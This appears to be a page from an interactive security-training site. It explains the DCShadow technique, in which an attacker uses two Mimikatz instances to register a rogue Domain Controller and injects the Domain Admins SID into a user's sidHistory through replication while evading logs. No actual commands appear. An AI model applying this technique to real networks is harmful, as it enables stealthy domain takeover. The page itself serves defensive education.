Skip to main content
Support

DCShadow

Register a Rogue Domain Controller

Temporarily register a rogue Domain Controller in Active Directory, push malicious changes via legitimate replication, and leave virtually no logs on the real DCs.

Advanced~6 minT1207
Prerequisites:Domain Admin or equivalent rightsTwo Mimikatz instances (one to push, one to trigger replication)Network access to Domain Controller
1

Start Mimikatz DCShadow — Register Rogue DC

DCShadow — Step 1/4
[Terminal 1] mimikatz #

Click or press Enter to skip

Step 1: Prepare Malicious Changes

The first Mimikatz instance defines what changes to push. Here we are adding the Domain Admins SID to a user's sidHistory attribute — effectively granting them DA privileges without adding them to the group.

We are preparing a fake Domain Controller that will push a single change: giving "targetuser" the same access as a Domain Admin by injecting a special attribute. This is like preparing a counterfeit authorization letter.

Attack Flow
Queue changes
Attacker(Domain Admin)
Rogue DC(WS01)
DC01(Real DC)
Request
Response
Attack
Data
Back to all scenarios
SourceSudo

Content sourced from Microsoft Documentation, MITRE ATT&CK Framework, NIST SP 800-63/171, adsecurity.org (Sean Metcalf), SpecterOps research, and SANS Reading Room. For educational purposes only.

MITRE ATT&CKADSecurity.org